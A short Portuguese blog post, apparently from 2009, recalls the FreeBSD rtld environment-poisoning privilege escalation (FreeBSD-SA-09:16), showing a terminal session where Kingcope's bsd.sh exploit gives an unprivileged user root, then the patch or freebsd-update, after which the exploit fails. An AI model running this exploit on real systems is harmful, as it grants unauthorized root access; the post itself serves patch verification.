12.08
O exploit foi publicado no exploit-db.com dia 30/11/2009 e o Security Advisory saiu dia 03/12/2009, mas não custa nada relembrar isso. :)
*Falha: Elevação de privilégios no rtld com envenenamento de ambiente. (FreeBSD Brasil)
*Sistema: FreeBSD 7.1, 7.2, 8.0
*Security Advisory: FreeBSD-SA-09:16.rtld
*Exploit: FreeBSD Run-Time Link-Editor Local
Testar o exploit é extremamente simples.
Logado com um usuário não privilegiado, baixe e execute o exploit…
$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$ ./bsd.sh
bsd.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#
# id
uid=1001(b0t) gid=1001(b0t) euid=0(root) groups=1001(b0t)
Caso ainda não tenha atualizado o seu Sistema, é só realizar o procedimento do Security Advisory ou usar o freebsd-update.
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc
(root@fbsd8) /tmp# cd /usr/src/
(root@fbsd8) /usr/src# patch < /tmp/rtld.patch
(root@fbsd8) /usr/src# cd /usr/src/libexec/rtld-elf/
(root@fbsd8) /usr/src/libexec/rtld-elf# make obj && make depend && make && make installou
(root@fbsd8) ~# freebsd-update fetch install
Depois é só testar o exploit novamente…
$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$
$ ./bsd.sh
bsd.sh env env.c program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting
$
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
Abs!
No Comment.
Add Your Comment